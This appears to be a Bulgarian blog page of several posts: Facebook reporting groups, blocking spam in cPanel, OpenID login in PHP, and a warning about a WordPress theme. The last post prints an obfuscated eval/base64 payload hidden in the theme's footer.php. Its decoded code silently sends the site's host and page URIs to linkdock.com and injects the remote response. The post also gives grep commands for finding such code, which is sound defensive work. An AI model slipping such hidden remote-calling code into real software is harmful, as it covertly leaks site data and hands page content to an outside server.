На първо място напълно подкрепям мирните протести срещу „цар Киро“ и всеки друг подобен мутренски феодал, независимо от неговия етнос. Болно и обидно ще ми стане, ако „цар Киро“ получи само 6 години затвор – заслужава много повече! Бих подкрепил всяка Facebook група, която призовава за законно и справедливо наказание, например „Смъртно наказание за цар Киро!“, но не и група, която призовава към беззаконие и саморазправа, като например страница със заглавие „Смърт за цар Киро!“.

Бях поканен от bTV като Интернет експерт с цел да им покажа нагледно, как точно технически се подават сигнали към Facebook. Наистина има няколко групи с няколко хиляди души в тях, които активно подават сигнали към Facebook, но не към всички групи свързани с Катуница, а само към крайно расистки. Всички те изпращат сигнали, но само единствено хората от Facebook могат да спират страници във Facebook. Страниците се свалят от Facebook, само ако има реална причина за това, като това отново се решава само и единствено от Facebook.

В Интернет беше публикувана информация, че МВР и ГДБОП правели мониторинг на мрежата и спирали страници. Ако има такива групи, те нямат нищо общо с групите, в които участвам аз. Доскоро не знаех, че  държавни правови органи по света и у нас могат да трият съдържание във Facebook, както и да изискват от Facebook информация за потребителски профили. За ЕС се ползва рамката EU Safe Harbor: http://export.gov/safeharbor  – европейска спогодба, според която Facebook са длъжни да съдействат.

Понятията „Фейсбук полиция“  и „Фейсбук контрольори“ бяха измислени от репортери на bTV с цел сензация. Признавам, че се съгласих с тези понятия без да си давам сметка, че те лесно могат да бъдат асоциирани с някакви служби. Категорично заявявам, че нямам нищо общо с политически партии или държавни служби.

Групите в които участвам аз, са били създадени с цел защита от измамите във Facebook, самия аз бях поканен в една от тях, а после се включих и в други подобни. Там се подават сигнали преди всичко за: фалшиви профили, откраднати профили, страници, които се опитват да ви измамят, страници, които разпространяват спам, порнографски страници, страници призоваващи към насилие и др. Категорично смятам, че тези групи са полезни и реално помагат на хиляди хора, да не бъдат измамени във Facebook и за намаляване на спама в мрежата.

От месеци във  Facebook се създават все повече фен страници, които имат една единствена цел да трупат колкото се може повече фенове, като ползват скрита техника, която те прави фен на страницата без да разбереш (Likejacking). Също така е възможно да станеш фен на съвсем друга страница във Facebook, която дори не си виждал. Понякога ставаш фен не на една, а на няколко фен страници.

"Вселената и глупостта на хората са безкрайни, но за първото не съм сигурен". Алберт Айнщайн.

Подобни статии:

1. Създаване на фен страница във Facebook Статията е насочена към създаване на фен страница на бизнес...

За мен СПАМ е всяко едно неочаквано имейл съобщение, дори запитване дали може да ми пратят непоискано съобщение

Напоследък върлува следния досаден СПАМ със заглавие: „Въпрос от Бизнес Каталог България“ и текст:

Уважаеми Дами и Господа,
Бихме желали да поискаме разрешение да ви изпратим непоискано търговско съобщение.
Темата му е „Каталог Медия и Реклама 2010″
Ако искате да го прочетете, можете да посетите този линк …
Ако не желаете да получавате повече полезна информация от нас, можете да запишете Вашият мейл тук …
С уважение,
Бизнес Каталог България
02 421 40 44
www.cаtаlogbg.biz

office@cаtаlogbg.biz

office@bаzi-dаnni.com

Това съобщение се получава по няколко пъти в една пощенска кутия. На пръв поглед това е съвсем културно съобщение, но искам да ти обърна внимание, че подобна опция при която се записваш, че не желаеш да получаваш имейли е много опасна! Това е сигурен начин да покажеш, че този имейл не само е валиден, а се преглежда редовно от човек. След като натрупат солидна база данни с примерно 20 000 имейла, тази компания може да реши тайно да продаде тази база с имейл адреси и тогава наистина ще започнеш да получаваш много съобщения. Подобен сценарий се случва всеки ден по света. Трябва добре да познаваш фирмата, която стои отсреща и да и имаш доверие. Например Google.

Ако искаш да спреш да получаваш подобни имейли във всичките мейл акаунти на твоя сайт и ако използваш хостинг с cPanel, може да направиш това, като блокираш този изпращач да не може да ти изпраща повече имейли. Това се прави лесно.

Блокиране на СПАМ през cPanel

Влез в cPanel контролния панел на твоя хостинг, в секцията Mail избери “Account Level Filtering”. Натисни бутона [Create a new Filter]. В първото поле Filter Name: въведи някакво име, което да те подсеща за какво е филтъра, например bazidanni. В полето под „Rules“ в първия падащ списък остави избрано From, а във втория избери contains и в полето отдолу въведи bazi-danni.com. В падащия списък под Actions остави избрано Discard Message. Натисни бутона [Activate] и ще имаш филтър, който ще унищожава всички имейл съобщения, които съдържат в хедъра си From низа bazi-danni.com. От този момент няма да получаваш повече писма, от пощенски кутии, които завършват на @bazi-danni.com.

По подобен начин може да зададеш друг филтър, като например вместо From избереш Subject и като текст въведеш Viagra. По този начин ще бъдат изтривани автоматично писма с оферти за виагра.

Темата е доста обширна и тук е даден само бърз пример

Някой от страниците на сайта ganbox.com реших да са достъпни само след логване, затова ми се наложи да си направя логин форма, през която потребителите да се логват и да получават достъп. Обикновено една такава система включва в себе си няколко функции: страница за регистриране, страница за логване, страница за забравена парола, страница за промяна на парола или други лични данни, управление на сесии, база данни с данни за потребителите. Мислих няколко варианта и накрая реших, че без последните две няма как да мина, но нямам време да правя другите страници. Затова избрах решение с OpenID логване.

Какво е OpenID?

Съвсем накратко: с една парола достъп до много сайтове. Това е метод, който обединява протокол и системи, който ти дава възможност да се регистрираш в един сайт и след това да получаваш достъп до много други сайтове, които поддържат OpenID, само като се логваш в първия сайт.

Как работи OpenID

Регистрираш се в един сайт, който е доставчик на OpenID и там получаваш данни за достъп до акаунта, които обикновено са комбинация от имейл и парола или потребителско име и парола. От този момент можеш да се логваш във всеки един сайт, който поддържа този доставчик на OpenID.

Някои от сайтовете, като например сайта за споделяне на връзки dao.bg (а и много други подобни сайтове), изискват първо да си създадеш профил в сайта и едва след това може да присъединиш OpenID идентификатор в профила си, за да може да се логваш с OpenID.

Трик за сигурност: След като въведеш OpenID е препоръчително да смениш паролата си в този сайт с някаква невъзможно сложна и дълга парола.Тъй като няма повече да ползваш тази парола, от съображения за сигурност е по-добре да не може да бъде налучкана от хакери.

Предимства на OpenID

1. Без измисляне на нови пароли.

Не е нужно да помниш много пароли, а само една и по-рядко ще ти се случва да забравиш паролата си.

2. Бърза регистрация.

В повечето сайтове, в които искаш да влезеш няма да ти се налага да се регистрираш или ако има такава стъпка доста от данните ще бъдат попълнени, защото се изпращат от сайта доставчик на OpenID.

3. На уеб програмистите спестява време.

Отпада нуждата от програмиране на няколко уеб страници.

4. По-висока степен на сигурност.

Виж по-долу в параграфа Сигурност.

Недостатъци на OpenID

Хора които са слабо запознати с интернет технологиите и с OpenID могат да се уплашат, че за вход в твоя сайт трябва да въведат паролата си за Гугъл. Това се случи в ganbox.com, затова в логин страницата поставих блок Информация.

Сигурност

Всъщност метода на логване през OpenID е с висока степен на сигурност, защото въвеждаш паролата си в страница на Гугъл защитена с SSL и това, което Google изпраща към сайта, в който се логваш се контролира от теб. В случая на ganbox.com това е единствено имейл адреса, като при първото изпращане ти получаваш предупреждение за това и се съгласяваш с това действие.

Трябва да гледаш с добро око на сайтовете, които предлагат OpenID логин. Повечето хора използват една и съща парола за няколко сайта. Ако и ти правиш така, то при използване на OpenID избягваш следния риск (макар и минимален). При регистриране в нов сайт в момента на въвеждане на паролата е възможно някой от администраторите да получи тази парола в чист текст. След това той може да злоупотреби и ще има достъп до всичките сайтове, в които използваш тази парола. При OpenID нямаш този проблем, защото в новия сайт не се изпраща парола.

Логване с OpenID в страница на PHP

В ganbox.com за начало като OpenID доставчик избрах Google, защото почти всеки има поща в gmail.com или ползва друга услуга на Google и има Google акаунт. В последствие може да се добавят още доставчици, като например Facebook и човек ще може да си избира с кой от двата да се логне.

В този урок ще покажа как да си направиш логване в твоя сайт през акаунт на Гугъл.

1. Изтегли си библиотеката class.openid.php, разархивирай файла и го постави в директория inc, която трябва да е в главната уеб директория.

2. В главната уеб директория създай два файла login.php и return.php

Основния код в login.php, който стартира процес по логване е:

Функция user_logged() проверява дали потребителя се е логнал.
Последния параметър true на GoogleOpenId::login указва дали твоя сайт ще изиска имейл адрес.
Този ред ще пренасочи браузъра към страница за логване в Google профил (ако вече не си логнат в Гугъл), след като се логнеш първият път ще ти се изведе съобщение, че сайта изисква имейл и трябва да се съгласиш да предоставиш тази информация, след което ще те редиректнат отново към http://ganbox.com/return.php

В return.php основния код е:

В този код функцията user_login() се грижи да създаде сесия и да отбележи, че потребителя е логнат. Ако до момента не е имало потребител с подадения имейл, автоматично го регистрира и логва.
Това е всичко по оторизирането на потребителя – просто и бързо.

След това във всяка страница, в което искам да огранича достъпа викам функция user_logged(), която проверява дали потребителя е логнат и ако не е логнат или ако сесията е изтекла се пренасочва към страница за логване.

Работещ пример има в сайта ganbox.com, като с ограничен достъп са страниците Класиране на сайт, SEO състояние на сайт и Промяна на снимка.
Това е накратко. Ако има интерес и имам време мога да дам пълните кодове. Пишете коментари!

Подобни статии:

1. Оптимизиране на бързодействието на сайт Пиша тази статия като продължение на статията PHP парсване на...
2. Споделяне на достъп до Google Analytics и Google Adwords Google Analytics Google Analytics е безплатен уеб инструмент на Гугъл...

Пиша тази статия за всички ползващи WordPress, които не обичат да ги следят без тяхно знание.

Проблем:

Безплатна тема за WordPress с име Red_wave от автор AskGraphics се разпространява свободно на сайта http://wordpresstemplates.name, но открих, че съдържа във файла footer.php следния обфускиран PHP код:

<? eval(gzinflate(base64_decode(‘vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+

X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5

K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNS

Se/o3KiJhSMq1Fk6i5rCV1llGS6mAHub2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqmodSM0h5p4

HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A’))); ?>

(Всичко това е на един ред).

Което всъщност представлява следния зашифрован PHP код за проследяване:

error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])
."&uri=".urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen")))
&& function_exists("file_get_contents")) {
	echo @file_get_contents($CodeURL);
} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen")))
&& function_exists("file")) {
	$content = @file($CodeURL);
	echo @join("", $content);
} elseif (function_exists("curl_init")) {
	$ch = curl_init($CodeURL);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_exec($ch);
	curl_close($ch);
}

Както се вижда този скрипт изпраща до сървъра linkdock.com не само името на вашия домейн, а и точната страница, която в момента отваря посетителя.

Защо го правят?

С този код получават интернет трафик от различни уникални IP адреси, който се отчита в статистиките на сървъра им. Отчитат се повече посещения и сървъра може да продава рекламите си по-скъпо.
Решение:

Просто изтрий този ред от файла wp-content/themes/Red_wave/footer.php

В случая скрипта не носи някаква вреда, освен че забавя излишно зареждането на всяка една страница от блога и ако отсрещния сървър е претоварен, това ще доведе до много дълго време за зареждане на твоите страници на блога и дъното на сайта може да се чупи и размества. Ако твоя блог е прекалено често бавен, това няма да се хареса на бота на Google и е възможно твоя сайт да падне в SERP-а.

Често тази техника се ползва за да може автора на плъгина да вгради връзка към своя сайт, която да не може да бъде лесно открита и изтрита, но е възможно злонамерен сайт да разпространява безплатни темплейти или плъгини за WordPress, които да навредят на сайта, като например да изтрият всички статии.

Общи съвети за сигурност

Нека тази статия бъде предупреждение за всеки, който ползва темплейти или плъгини от непроверен източник. Съветвам те след като си свалиш тема или плъгин първо да пуснеш търсене в текста на всички файлове за опасни функции като eval(). Под Linux това става като от конзолата влезеш в директория wp-content и потърсиш с команда:

grep --include=*.php -r "eval(" *

Трябва тази команда да не изведе нищо. Ако излезеш една директория нагоре в главната уеб директория и пуснеш командата отново, там ще има няколко резултата, но повод за притеснение има само ако съдържат  base64_decode или gzinflate. Може да провериш това с командата:

grep --include=*.php -r "eval(" * | grep -e "base64_decode\|gzinflate"

Ако в eval има кодиран низ, като този по-горе и не знаеш как да го провериш, тогава по-добре не ползвай тази тема или плъгин. Колкото по красиво и професионално изглежда тимплейта, толкова по-силно ще се изкушаваш да го вградиш в твоя блог, но не искаш данните ти да пострадат нали? Знай, че това е възможно и много лесно да се направи.

Друг проблем със сигурността е небрежно написан код, който създава дупка в сигурността без знанието на разработчика на софтуера. Сигурно в 95% от случаите на хакване на сайт се дължат на това. Всеки допълнителен плъгин, който добавяш увеличава вероятността да поставиш дупка в сигурността в твоя сайт, затова не инсталирай плъгини, които не ползваш или такива, които ползваш много рядко.

Старите версии на WordPress имаха дупки в сигурността и вероятно и в бъдеще ще има такива. Много хора си мислят, че като качат най-новата версия на софтуера и така са защитени, но това не винаги е така.

Правило за обновяване на софтуер

Ето едно просто правило за обновяване, което важи не само за WordPress, а и за всеки един софтуер: В момента последната версия на WordPress е 2.8.4 и ако излезе нова версия 2.8.x като 2.8.5 или 2.8.6 обикновено запушва дупки в сигурността и поправя бъгове, затова е добре да я инсталираш веднага. Например 2.8.4 поправя дупка в сигурността на версии <=2.8.3, чрез която може да се променя паролата на admin, затова веднага обнови до тази версия.

Но ако излезе версия с нова цифра като 2.9 (или направо 3.0) е много вероятно такава версия да има дупки в сигурността и е по-добре да изчакаш версия 2.9.1 или дори 2.9.2 и чак тогава да обновиш софтуера си. По този начин намаляваш риска значително.